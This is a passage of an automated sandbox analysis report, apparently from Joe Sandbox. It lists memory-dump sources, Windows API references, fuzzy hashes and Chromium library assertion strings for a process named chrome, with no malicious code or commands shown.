                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireEventReset$Release
                                                                    • String ID:
                                                                    • API String ID: 3881449772-0
                                                                    • Opcode ID: 5bcf2b763f3b9ad1febbdcc66001b554c6c80113f72f72bdbbb71986054cfaa7
                                                                    • Instruction ID: 0d7b62be5ad828185c25b2a2eeb94cb91f4ca77ffa119fcce3b2b932e22e7ed0
                                                                    • Opcode Fuzzy Hash: 5bcf2b763f3b9ad1febbdcc66001b554c6c80113f72f72bdbbb71986054cfaa7
                                                                    • Instruction Fuzzy Hash: C7510822A1D642C7EA65FB21E4503B9B3A0FB84B88F854133DB4E07BA5DF3DE4518760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$ErrorLastTimes
                                                                    • String ID:
                                                                    • API String ID: 2562579171-0
                                                                    • Opcode ID: a6a7423221be21536e6d29388287407de6b2731f2d2837c965f78fd7ed09cd02
                                                                    • Instruction ID: a0574db617412ab18f928dea6f4103f2f38561b66a2884605332efb1880bd93a
                                                                    • Opcode Fuzzy Hash: a6a7423221be21536e6d29388287407de6b2731f2d2837c965f78fd7ed09cd02
                                                                    • Instruction Fuzzy Hash: E921F521A5C687C6FAA4FB51B51417AE390AF84BD0F845432DA8F86B74DF2CE5818720
                                                                    APIs
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00007FF74CD14014
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                                    • API String ID: 1678258262-2888085009
                                                                    • Opcode ID: 4be791cfbacd40cacf5068daf03177c2bd7f8910f95d7553e7a7888b5f1a3e96
                                                                    • Instruction ID: 6b5248c2a272d9c6479e0b0cfb5baf1b2007c4206dd670109a54a4e69bbd48ca
                                                                    • Opcode Fuzzy Hash: 4be791cfbacd40cacf5068daf03177c2bd7f8910f95d7553e7a7888b5f1a3e96
                                                                    • Instruction Fuzzy Hash: C3B1AA76B1DB82C6DA10FF26E5441BAA7E4FB44B94F908132EAAD07794DF38E451CB10
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF74CD10A06
                                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF74CD10A31
                                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF74CD10A79
                                                                      • Part of subcall function 00007FF74CCEC3D0: TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,-0000000400000000,?,?,?,00007FF74CC310DD), ref: 00007FF74CCEC3F3
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00007FF74CD10BF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                                    • API String ID: 1385397084-4189810390
                                                                    • Opcode ID: 9d95bff838e9ab0c848067562b8fd4e78f4b5e2f502f707665075beff53f726f
                                                                    • Instruction ID: 61df599561c0e0f29a14140859c260e1c06b5511ef19929a35a794c438a7f788
                                                                    • Opcode Fuzzy Hash: 9d95bff838e9ab0c848067562b8fd4e78f4b5e2f502f707665075beff53f726f
                                                                    • Instruction Fuzzy Hash: E3815A32A6CB81C2E720EB24A45037EB7A0EB59748F94423AD79E06791DF7CE195C750
                                                                    APIs
                                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,-0000000400000000,?,00000178,?,?,?,00007FF74CCE4858), ref: 00007FF74CDC0488
                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,-0000000400000000,?,00000178,?,?,?,00007FF74CCE4858), ref: 00007FF74CDC04AA
                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,?,-0000000400000000,?,00000178,?,?,?,00007FF74CCE4858), ref: 00007FF74CDC04BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: <
                                                                    • API String ID: 1678258262-4251816714
                                                                    • Opcode ID: 9edc4e50de212ba1a6eac2c88948a3f51654576dfd081db5aa3ca56f8f95cb54
                                                                    • Instruction ID: 58e0e5104e6691cb1fbb4753241ddadcb9cb710cba1a965ac52eacdf141073d8
                                                                    • Opcode Fuzzy Hash: 9edc4e50de212ba1a6eac2c88948a3f51654576dfd081db5aa3ca56f8f95cb54
                                                                    • Instruction Fuzzy Hash: F1510721B1CA42C5EA12BB25951027AE355BF55BD4F944733EE5E36690EF3CF083CA50
                                                                    APIs
                                                                    • TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF74CC341E9
                                                                    • ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF74CC3428F
                                                                    • AcquireSRWLockExclusive.KERNEL32 ref: 00007FF74CC34303
                                                                      • Part of subcall function 00007FF74CD59864: AcquireSRWLockExclusive.KERNEL32(?,?,-5555555555555556,00007FF74CD4CD35,?,?,?,?,?,?,?,?,?,?,00007FF74CDB45FB), ref: 00007FF74CD59874
                                                                      • Part of subcall function 00007FF74CD59864: ReleaseSRWLockExclusive.KERNEL32(?,?,-5555555555555556,00007FF74CD4CD35,?,?,?,?,?,?,?,?,?,?,00007FF74CDB45FB), ref: 00007FF74CD598B4
                                                                    Strings
                                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00007FF74CC34314
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$Acquire$Release
                                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                                    • API String ID: 1678258262-2510419621
                                                                    • Opcode ID: 5a45514a3a19be85f2a7904a8f74e662056a57fb8e5f425262ec1518abd866ac
                                                                    • Instruction ID: 30306d2c2ac6d517a47431b1839174c32c7a062f937645191360fef5b12a833e
                                                                    • Opcode Fuzzy Hash: 5a45514a3a19be85f2a7904a8f74e662056a57fb8e5f425262ec1518abd866ac
                                                                    • Instruction Fuzzy Hash: F7518121A0CA96C1FA50FB11F8412B8E7A0BB51794FC50233EA5D676A5DF3CE446CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionSleepVariable
                                                                    • String ID: ..\..\base\synchronization\condition_variable_win.cc$ScopedBlockingCallWithBaseSyncPrimitives$TimedWait
                                                                    • API String ID: 1382704212-1641630961
                                                                    • Opcode ID: 11a1370b366eec48785f741db4d5dd95f1731b2cab1e8a4ef437865d0b25a4f8
                                                                    • Instruction ID: c161789945e86e3cd08bf403e06505dd12b0677f2766cbe44dcaccc57e121fda
                                                                    • Opcode Fuzzy Hash: 11a1370b366eec48785f741db4d5dd95f1731b2cab1e8a4ef437865d0b25a4f8
                                                                    • Instruction Fuzzy Hash: 8C41D071B0CAC2D1EB21FB29A4053F9A3A1BF95794F848133DA8D46795EF2DD18A8710
                                                                    APIs
                                                                      • Part of subcall function 00007FF74CCE41F0: QueryPerformanceCounter.KERNEL32 ref: 00007FF74CCE4326
                                                                      • Part of subcall function 00007FF74CCE41F0: TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF74CCE4386
                                                                      • Part of subcall function 00007FF74CCE41F0: ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF74CCE43D6
                                                                    • GetCurrentDirectoryW.KERNEL32 ref: 00007FF74CC9829C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireCounterCurrentDirectoryPerformanceQueryRelease
                                                                    • String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW$ScopedBlockingCall
                                                                    • API String ID: 179109050-3482229333
                                                                    • Opcode ID: 19c1064fdfa415a6ccff493b94d68e1d1baff66dfb188d2e77e7c97db93661dc
                                                                    • Instruction ID: 63a8c4663f1d374b6dbd6ab9ee1186e024157a5f30d092765e48c38f0e6a7fae
                                                                    • Opcode Fuzzy Hash: 19c1064fdfa415a6ccff493b94d68e1d1baff66dfb188d2e77e7c97db93661dc
                                                                    • Instruction Fuzzy Hash: E4417E22B1CA82D1FA21BF25E4557EAA760FF85784F845032EA8D07656DF3CE185CB10
                                                                    APIs
                                                                    • UnmapViewOfFile.KERNEL32(00000001,00000000,?,00007FF74CC39083,?,?,chrome.dll,?,?,00000010,?,00007FF74CC38DC9), ref: 00007FF74CC38F08
                                                                    • GetModuleHandleW.KERNEL32(00000001,00000000,?,00007FF74CC39083,?,?,chrome.dll,?,?,00000010,?,00007FF74CC38DC9), ref: 00007FF74CC38F70
                                                                    • GetProcAddress.KERNEL32(?,?,chrome.dll,?,?,00000010,?,00007FF74CC38DC9), ref: 00007FF74CC38F80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                                    • String ID: GetHandleVerifier
                                                                    • API String ID: 3224599007-1090674830
                                                                    • Opcode ID: 5bf1740b5ec41a056b656264107ff814ae87100a2e089269d36b01a65bafaac8
                                                                    • Instruction ID: bc0d7c146a8f960504b1b024ab5d36ffa08224715594bb9eeb8b39ffc8113454
                                                                    • Opcode Fuzzy Hash: 5bf1740b5ec41a056b656264107ff814ae87100a2e089269d36b01a65bafaac8
                                                                    • Instruction Fuzzy Hash: 19215C25A0DA16C2FA65FB65F855379A362BF88B84F945533DA0E123A4DF3CE485C320
                                                                    APIs
                                                                      • Part of subcall function 00007FF74CCE41F0: QueryPerformanceCounter.KERNEL32 ref: 00007FF74CCE4326
                                                                      • Part of subcall function 00007FF74CCE41F0: TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF74CCE4386
                                                                      • Part of subcall function 00007FF74CCE41F0: ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF74CCE43D6
                                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00007FF74CC37B3A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireCounterCurrentDirectoryPerformanceQueryRelease
                                                                    • String ID: ..\..\base\files\file_util_win.cc$ScopedBlockingCall$SetCurrentDirectoryW
                                                                    • API String ID: 179109050-623993952
                                                                    • Opcode ID: e9f348c34c5f1f34696ba619135a208bb53c54dcfd50856a8c196ba368caca51
                                                                    • Instruction ID: ab0a5024268de491cfe6d279687f47899b395a11c2ba1971661629b024a13dcd
                                                                    • Opcode Fuzzy Hash: e9f348c34c5f1f34696ba619135a208bb53c54dcfd50856a8c196ba368caca51
                                                                    • Instruction Fuzzy Hash: CF213021B0C6D2D1FA21BB25F4117FAA360BF95784F844032DE8C17665DE3DE54ACB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$CodeExitMultipleObjectsWait
                                                                    • String ID:
                                                                    • API String ID: 3026435989-0
                                                                    • Opcode ID: 98a7c706cc86354f63901372503f5485004e753224adfcaf7897b7ec422c9402
                                                                    • Instruction ID: b5b6dd04a2d5328a2f97a1dcf81f13d731bb53e416f714416ee4e035b73412e1
                                                                    • Opcode Fuzzy Hash: 98a7c706cc86354f63901372503f5485004e753224adfcaf7897b7ec422c9402
                                                                    • Instruction Fuzzy Hash: A311A532B0CB42C6F760FB25F49463DB3A0BB48B80F958532DA5E477A4DE2CD4958B10
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FF74CC406C3), ref: 00007FF74CCC69F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
                                                                    • Associated: 00000007.00000002.2003019166.00007FF74CC30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2003937970.00007FF74CE62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE63000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004003446.00007FF74CE70000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004541951.00007FF74CE71000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004612735.00007FF74CE7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004699607.00007FF74CE90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004778583.00007FF74CE91000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000007.00000002.2004849501.00007FF74CE92000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ff74cc30000_chrome.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                                    • API String ID: 2962429428-1704384866
                                                                    • Opcode ID: 981239e2bce08509d5bddfbac5de342a181c1d2295f0c45900289085230fb345
                                                                    • Instruction ID: bc209a212c67892ce9247e4472a89539bc36bbf57169c2ade55dbdc509f2c307
                                                                    • Opcode Fuzzy Hash: 981239e2bce08509d5bddfbac5de342a181c1d2295f0c45900289085230fb345
                                                                    • Instruction Fuzzy Hash: 6FF08C21B0C696D1FD00FB25AA151B9A325AF85BD0FC04033D90D2B69ACF2CE142CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
